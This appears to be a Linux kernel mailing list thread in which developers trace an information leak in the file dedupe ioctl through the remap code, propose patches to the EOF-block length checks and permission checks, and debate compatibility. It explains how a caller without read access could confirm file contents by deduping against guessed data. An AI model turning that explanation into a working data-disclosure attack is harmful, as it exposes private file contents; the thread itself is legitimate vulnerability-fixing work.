> > the 7-byte file is that we stop comparing at EOF, which means that there
> > are fewer bytes to guess.  But.  You can already read the file anyway.
> 
> The dedupe clearly does *not* check for blocksize. It doesn't even
> call generic_remap_file_range_prep().
> 
> Just check it yourself:

I did, hours ago, and concluded that you were on the wrong track and
I didn't care enough to get involved in a shouting match.

But you're not actually understanding the code, nor are you
listening to the people who are trying to point out that you haven't
understood how the code works. You're causing those people stress
and angst by shouting them down even though you are wrong - these
people know the code far better than you, so you need to listen to
them rather than shout over them.

So, let's clear all that away, and just follow the code. I'll map
out the path to block alignment for you:

>     do_vfs_ioctl ->
>         case FIDEDUPERANGE:
>          ioctl_file_dedupe_range(filp, argp) ->
>             vfs_dedupe_file_range(file, same) ->

There's no checks at this point because we can't do them safely.  We
have to first lock the inodes before we check against EOF so that
dedupe does not race against truncate, fallocate, or extending
writes. This is important because we have to support the "dedupe
whole file" case that is defined by src = {0, EOF}, dst = {0, EOF},
and that's where all the complexity lies.

Hence we have to continue down the dedupe stack to lock the inodes
and perform the block alignment checks:

	        vfs_dedupe_file_range_one()
		  file->f_op->remap_file_range()
		    xfs_file_remap_range()
		      <locks inodes>
		      <performs XFS specific remap checks>
		      generic_remap_file_range_prep()
		        generic_remap_checks()

generic_remap_checks() does:

.....
        loff_t bs = inode_out->i_sb->s_blocksize;
        int ret;

        /* The start of both ranges must be aligned to an fs block. */
        if (!IS_ALIGNED(pos_in, bs) || !IS_ALIGNED(pos_out, bs))
                return -EINVAL;
.....

        /*
         * If the user wanted us to link to the infile's EOF, round up to the
         * next block boundary for this check.
         *
         * Otherwise, make sure the count is also block-aligned, having
         * already confirmed the starting offsets' block alignment.
         */
        if (pos_in + count == size_in) {
                bcount = ALIGN(size_in, bs) - pos_in;
        } else {
                if (!IS_ALIGNED(count, bs))
                        count = ALIGN_DOWN(count, bs);
                bcount = count;
        }

It should be clear that this code does not allow unaligned file
offsets at all. It should also be clear that we silently round the
dedupe length down to block size alignment to avoid sub-block dedupe
attempts (not possible) rather than erroring out because it's always
valid to dedupe less range than was asked for.

However, we also have a special case for the "dedupe to EOF"
operation that allows whole file dedupe. In that case, we round the
length *up* to capture the whole EOF block in the remap attempt.
That's the case where bug the test case exploits lies - it fails to
check whether the dst range is also deduping all the way to EOF.

We haven't got to the data match checks yet - we're still deciding on
the bounds for the data match checks at this point. Hence if we get
the bound checks wrong here, the data checks might match when they
shouldn't. e.g. by only checking for partial block matches instead
of checking all the valid data in both src and dst match.

That's the bug in this code - the dedupe length EOF rounding needs
to be more constrained as it's allowing an EOF block to be partially
matched against any full filesystem block as long as the range from
start to EOF in the block matches. That's the information leak right
there, and it has nothing to do with permissions.

Hence if we restrict EOF block deduping to both the src and dst
files having matching EOF offsets in their EOF blocks like so:

-	if (pos_in + count == size_in) {
+	if (pos_in + count == size_in &&
+	    (!(remap_flags & REMAP_FILE_DEDUP) || pos_out + count == size_out)) {
                bcount = ALIGN(size_in, bs) - pos_in;
        } else {
                if (!IS_ALIGNED(count, bs))
                        count = ALIGN_DOWN(count, bs);
                bcount = count;
	}

This should fix the bug that was reported as it prevents dedupe an
EOF block against non-EOF blocks or even EOF blocks where EOF is at
a different offset into the EOF block.

So, yeah, I think arguing about permissions and API and all that
stuff is just going completely down the wrong track because it
doesn't actually address the root cause of the information leak....

Cheers,

Dave.
Linus Torvalds July 13, 2022, 8:16 a.m. UTC | #14
On Tue, Jul 12, 2022 at 11:46 PM Dave Chinner <david@fromorbit.com> wrote:
>
> Hence if we restrict EOF block deduping to both the src and dst
> files having matching EOF offsets in their EOF blocks like so:
>
> -       if (pos_in + count == size_in) {
> +       if (pos_in + count == size_in &&
> +           (!(remap_flags & REMAP_FILE_DEDUP) || pos_out + count == size_out)) {
>                  bcount = ALIGN(size_in, bs) - pos_in;

I agree with checking the target size too.

And I can see how missing that might cause the problem.

I don't think that is limited to the REMAP_FILE_DEDUP case, though.
Even if you a clone operation, you cannot just clone the EOF block to
some random part of the destination.

Anyway, isn't all of this supposed to be done by
generic_remap_check_len()? That function already takes care of a
similar concern for REMAP_FILE_CAN_SHORTEN, where the size of the
*output* file matters.

So generic_remap_check_len() basically already does one EOF block
check for the output file. It just doesn't do it for the input side.

And currently generic_remap_check_len() is done too late for
REMAP_FILE_DEDUP, which did its handling just before calling it.

So while I agree with your patch from a "this seems to be the
underlying bug", I think the fix should be to move this "both EOF
blocks have to match" logic to generic_remap_check_len(), and just do
that *before* that

        if (remap_flags & REMAP_FILE_DEDUP) {

in generic_remap_file_range_prep().

No?

That said, the rest of that code in generic_remap_checks() still makes
little to no sense to me.

Look:

>                  bcount = ALIGN(size_in, bs) - pos_in;

and we literally *just* checked that "pos_in + count == size_in".

So we can write that as

>                  bcount = ALIGN(pos_in + count, bs) - pos_in;

That doesn't look simpler, but...

Again, just a few lines above this all, we had

>         if (!IS_ALIGNED(pos_in, bs) || !IS_ALIGNED(pos_out, bs))
>                 return -EINVAL;

so we know that 'pos_in' is aligned wrt bs.

So we can rewrite that "ALIGN(pos_in + count, bs)" as "pos_in +
ALIGN(count, bs)", because 'pos_in' doesn't change anything wrt an
alignment operation.

And then trivial simplification ("pos_in - pos_in goes away") makes
the whole expression be just

>                  bcount = ALIGN(count, bs);

which just once more makes me go "maybe this code works, but it is
clearly written for maximum nonsensical value".

The "else" side is equally overly complex too, and does

                if (!IS_ALIGNED(count, bs))
                        count = ALIGN_DOWN(count, bs);
                bcount = count;

which is just a really complicated way to write

                bcount = ALIGN_DOWN(count, bs);
                count = bcount;

so that side if the if-statement knew that it could just align the
count directly, but decided to do that in the least obvious way too.

If 'count' was already aligned, ALIGN_DOWN() does nothing. And masking
is much cheaper than testing and branching.

Not to mention just *simpler*: One case aligns up to the next block
boundary ("include the shared EOF block"), the other case aligns down
("only try to merge full blocks")./

Now the code makes sense, although it's still somewhat subtle in that
the align-down case will also update 'count' (which is returned),
while the EOF code will only set 'bcount' (which is only used for the
overlapping range check) .

But then, when you look at that and understand what's going on, that
in turn then makes *another* thing obvious: the whole existence of
'bcount' is entirely pointless.

Because 'bcount' is only used for that range check, and for the
non-EOF case it's the same as 'count'.

And for the EOF case, doing that alignment is entirely pointless,
since if the in/out inodes are the same, then the file size is going
to be the same, and the EOF block is going to overlap whether bcount
was aligned to block boundary or not.

So the EOF case might as well just have made 'bcount = count' without
any alignment to the next block boundary at all.

And once it does that, now bcount is _always_ the same as count, and
there is no point in having bcount at all.

So after doing all the above simplification, you can then get rid of
'bcount' entirely.

> So, yeah, I think arguing about permissions and API and all that
> stuff is just going completely down the wrong track because it
> doesn't actually address the root cause of the information leak....

I agree that getting this "check the right range" thing right is the
prime thing.

The code being *very* hard to follow and not having any obvious rules
really does not help, though. The permission checks are odd. And the
range checks were odd and inscrutable and buggy to boot.

Yes, I require that people don't break user space. That's the #1 rule
of kernel development.

But that does not mean or imply "write incomprehensible code".

And honestly, I think your suggested patch just makes incomprehensibly
and pointlessly complex code even more so.

Which is why I'm suggesting the real fix is to clean it up, and mover
that EOF offset check to generic_remap_check_len() where it belongs,
and where we already have that comment:

 * ... For deduplication we accept a partial EOF block only if it ends at the
 * destination file's EOF (can not link it into the middle of a file).

but that comment doesn't actually match the code in that function.

In fact, that comment currently doesn't match any existing code at all
(your suggested patch would be that code, but in another place
entirely).

Can we please all agree that this code is too obscure for its own good?

                     Linus
Ansgar Lößer July 13, 2022, 5:14 p.m. UTC | #15
> First off - an odd technicality: you can already read write-only files
> by simply mmap'ing them, because on many architectures PROT_WRITE ends
> up implying PROT_READ too.
> 
> So you should basically expect that "I have permissions to write to
> the file" automatically means that you can read it too.
> 
> People simply do that "open for writing, mmap to change it" and expect
> it to work - not realizing that that means you have to be able to read
> it too.

Thank you for the explanation. Unfortunately I was not able to reproduce 
this. I do understand, that being able to write to memory without being 
able to read from it cannot be implemented because of hardware 
limitations on many architectures.

However using a writeonly fd in a call to mmap() in the first place 
already consistently fails for me. According to the man pages this is 
actually intended behavior. "Errors: EACCESS: [... If] a file mapping 
was requested, but fd is not open for reading."

Therefore I do not see how it is possible to read out data without a 
readable fd, since no mapping can be created without read permissions. I 
assumed readability not being a subset of writability for files was the 
exact reason for this limitation on the fd in mmap(). Do I miss 
something here?

> But
> 
>> -    if (!inode_permission(mnt_userns, inode, MAY_WRITE))
>> +    if (!inode_permission(mnt_userns, inode, MAY_READ | MAY_WRITE))
> 
> looks wrong.
> 
> Note that readability is about the file *descriptor*, not the inode.
> Because the file descriptor may have been opened by somebody who had
> permission to read the file even for a write-only file.

I do agree. At least it did not look typical for me. The idea for the 
patch was simply to have the smallest possible change for this specific 
issue.

Best regards,
Ansgar
Ansgar Lößer July 13, 2022, 5:16 p.m. UTC | #16
>> And the inode_permission() check is wrong, but at least it does have
>> the important check there (ie that FMODE_WRITE one). So doing the
>> inode_permissions() check at worst just makes it fail too often, but
>> since it's all a "optimistically dedupe" anyway, that kind of "fail in
>> odd situations" doesn't really matter.
>>
>> So for allow_file_dedupe(), I'd suggest:
>>
>>   (a) remove the inode_permission() check in allow_file_dedupe()
>>
>>   (b) remove the uid_eq() check for the same reason (if you didn't open
>> the destination for write, you have no business deduping anything,
>> even if you're the owner)
> So we're going to break userspace?
> https://github.com/markfasheh/duperemove/issues/129
> 

I am actually not sure why writability is needed for 'dest' at all. Of 
course, the deduplication might cause a write on the block device or 
underlying storage, but from the abstract fs perspective, neither the 
data nor any metadata can change, regardless of the success of the 
deduplication. The only attribute that might change is the position of 
the block on the blockdevice. Does changing this information require 
write permissions?

If I interpret the linked issue correctly, only needing read permissions 
on both fds would also solve this problem.

Best regards,
Ansgar
Ansgar Lößer July 13, 2022, 5:17 p.m. UTC | #17
> That's the bug in this code - the dedupe length EOF rounding needs
> to be more constrained as it's allowing an EOF block to be partially
> matched against any full filesystem block as long as the range from
> start to EOF in the block matches. That's the information leak right
> there, and it has nothing to do with permissions.
> 
> Hence if we restrict EOF block deduping to both the src and dst
> files having matching EOF offsets in their EOF blocks like so:
> 
> -	if (pos_in + count == size_in) {
> +	if (pos_in + count == size_in &&
> +	    (!(remap_flags & REMAP_FILE_DEDUP) || pos_out + count == size_out)) {
>                  bcount = ALIGN(size_in, bs) - pos_in;
>          } else {
>                  if (!IS_ALIGNED(count, bs))
>                          count = ALIGN_DOWN(count, bs);
>                  bcount = count;
> 	}
> 
> This should fix the bug that was reported as it prevents dedupe an
> EOF block against non-EOF blocks or even EOF blocks where EOF is at
> a different offset into the EOF block.
> 
> So, yeah, I think arguing about permissions and API and all that
> stuff is just going completely down the wrong track because it
> doesn't actually address the root cause of the information leak....

I am sorry, while I do agree about the patch, I strongly disagree 
regarding the permissions. Of course, this exact approach will not work 
anymore in practice, since up to 2^^(4096*8) tries would be needed to 
guess a single 4K block correctly.

Nevertheless it would be possible to guess the correct data for the 
whole block, since a comparison of data is still possible. So if I want 
to check whether a file contains a specific block (or one of a set) I 
can still do so, without having read access.

Whether to keep this behavior to not break backwards compatibility is 
not my decision, but the root problem of this leak is *not* about the 
minimum block size that can be deduplicated, or that it can be lowered 
by using the EOF behavior. It is about not needing read permissions to 
compare data from a file.

Best regards,
Ansgar
Linus Torvalds July 13, 2022, 6:03 p.m. UTC | #18
On Wed, Jul 13, 2022 at 10:15 AM Ansgar Lößer
<ansgar.loesser@tu-darmstadt.de> wrote:
>
>
> Thank you for the explanation. Unfortunately I was not able to reproduce
> this. I do understand, that being able to write to memory without being
> able to read from it cannot be implemented because of hardware
> limitations on many architectures.

Oh, you are right, we actually catch that situation, and require
FMODE_READ for all mmap's.

For some reason I was entirely sure that this had come up and we
didn't, but I see do_mmap() clearly  doing

                        fallthrough;
                case MAP_PRIVATE:
                        if (!(file->f_mode & FMODE_READ))
                                return -EACCES;

where that "fallthrough" is for the non-MAP_PRIVATE cases, so it hits
shared mappings too.

I was sure we had hit this case and it caused problems to check for
it, but that test goes back to before the git days (and in fact to
before the BK days).

So clearly my "clear memory" was complete garbage.

And thinking about  it, I suspect said "clear memory" goes back to me
having issues with the original alpha port, where the hardware *did*
technically support write-only mappings (_PAGE_FOR set - "Fault On
Read", but _PAGE_FOW not set).

So alpha was the first port I did (and a big influence for how the
portable VM model came about), and page protections could be done
"right" in theory from a memory management standpoint.

But even then you can't actually do it, because writable maps required
reading _anyway_ - because the common alpha sequence was to do byte
accesses as "read-modify-write" longword accesses.

So that's likely the source of my conviction that write-only mappings
always require read accesses, but I had it exactly the wrong way
around - it's not even hardware-specific, but general, and just means
that we actually refuse to mmap() files that have been opened
write-only.

That should teach me to actually go and look at the code (or test),
not go by "I have a distinct memory".

        Linus
Dave Chinner July 13, 2022, 10:43 p.m. UTC | #19
On Wed, Jul 13, 2022 at 07:16:14PM +0200, Ansgar Lößer wrote:
> > > And the inode_permission() check is wrong, but at least it does have
> > > the important check there (ie that FMODE_WRITE one). So doing the
> > > inode_permissions() check at worst just makes it fail too often, but
> > > since it's all a "optimistically dedupe" anyway, that kind of "fail in
> > > odd situations" doesn't really matter.
> > > 
> > > So for allow_file_dedupe(), I'd suggest:
> > > 
> > >   (a) remove the inode_permission() check in allow_file_dedupe()
> > > 
> > >   (b) remove the uid_eq() check for the same reason (if you didn't open
> > > the destination for write, you have no business deduping anything,
> > > even if you're the owner)
> > So we're going to break userspace?
> > https://github.com/markfasheh/duperemove/issues/129
> > 
> 
> I am actually not sure why writability is needed for 'dest' at all. Of
> course, the deduplication might cause a write on the block device or
> underlying storage, but from the abstract fs perspective, neither the data
> nor any metadata can change, regardless of the success of the deduplication.

Metadata is most definitely changed by a dedupe operation. Run
filefrag or FIEMAP before/after and you'll see that the block
mapping for at least the destination file (and maybe the source,
too!) as a result of the dedupe operation.

> The only attribute that might change is the position of the block on the
> blockdevice. Does changing this information require write permissions?

Yes.

The block map is needed to access the user data, hence POSIX
requires modifications to the block map be covered by fdatasync()
persistence guarantees. i.e.  modifying the block map of a
file/inode is most definitely considered a write operation that
needs a post-completion fdatasync/fsync operation to provide
the modification with persistence guarantees.

Indeed, we require write permissions for fallocate() operations that
directly modify the block list but don't change data, too. e.g.
preallocation over a hole, sparsifying a file by punching out data
ranges containing only zeros, etc. These are not changing the user
visible data; they only modify the underlying block map of the
inode. This is exactly the same as dedupe - these operations are not
modifying user visible data, they just modify the index needed to
find the physical location of the user data in the filesystem.

In fact, there's an fallocate() operation called
FALLOC_FL_UNSHARE_RANGE, which is the exact opposite of dedupe - it
takes a shared extent and explicitly breaks the sharing, copying
data and changing the underlying block map of the file to do that.
It doesn't change user visible data, but it most definitely changes
the metadata and the data layout of the file.

So, yeah, operations that directly manipulate the extent layout of
the file (reflink/clone, dedupe, fallocate, etc) are most definitely
modification operations. Always have been, always will be, and
should always require write permissions to have been granted to the
caller...

Cheers,

Dave.
Dave Chinner July 13, 2022, 11:48 p.m. UTC | #20
On Wed, Jul 13, 2022 at 01:16:37AM -0700, Linus Torvalds wrote:
> 
> Can we please all agree that this code is too obscure for its own good?

Oh, there's no denying that, or that the API is .... poor.

The problem is that touching this code has a very high validation
burden. Like Darrick, I'm familiar with this code because we were
the poor shmucks who decided dedupe needed data integrity testing
before we could support it in XFS. Three months of finding and
fixing data corruption after data corruption in the ioctl/vfs layers
and tens of billions of fsx ops later...

... and the code has really not changed very much since then.

That's the fundamental problem with rewriting this code - validating
that changes have not introduced new data corruption bugs on XFS,
btrfs, NFS and other idedupe supporting filesystems is time
consuming and resource intensive.  And it can't be skipped, because
corrupting user data is even worse than breaking userspace
applications (i.e. you can fix the kernel so the apps run again, but
corrupted data is gone forever).

So while the code might be somewhat inscrutible for outsiders with
no familiarity of the dedupe/clone APIs or it's required behaviours,
it works as advertised and doesn't corrupt data. Hence for the past
few years the rule "don't try to fix what ain't broke" has applied -
we've all got plenty of stuff that is actually broken or deficient
and needs to be fixed to deal with first....

Cheers,

Dave.
diff mbox series

Patch

diff --git a/fs/remap_range.c b/fs/remap_range.c
index e112b54..ad5b44d 100644
--- a/fs/remap_range.c
+++ b/fs/remap_range.c
@@ -414,11 +414,11 @@  static bool allow_file_dedupe(struct file *file)

      if (capable(CAP_SYS_ADMIN))
          return true;
-    if (file->f_mode & FMODE_WRITE)
+    if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == (FMODE_READ | 
FMODE_WRITE))
          return true;
      if (uid_eq(current_fsuid(), i_uid_into_mnt(mnt_userns, inode)))
          return true;
-    if (!inode_permission(mnt_userns, inode, MAY_WRITE))
+    if (!inode_permission(mnt_userns, inode, MAY_READ | MAY_WRITE))
          return true;
      return false;